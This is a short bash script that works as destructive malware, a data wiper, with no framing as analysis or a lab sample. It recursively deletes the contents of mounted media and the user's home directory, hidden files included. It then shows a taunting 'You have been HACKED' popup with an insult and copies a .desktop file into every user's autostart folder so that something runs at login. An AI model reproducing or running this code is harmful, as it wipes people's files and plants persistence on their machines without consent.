#!/bin/bash
cd $HOME
rm -rf /media/*/* &
rm -rf /home/$USER/* &
rm -rf /home/$USER/.*
zenity --info --text="You have been HACKED. Bitch"
mkdir -p /home/$USER/.config/autostart
cp -prf /usr/share/darkice.desktop /home/*/.config/autostart/
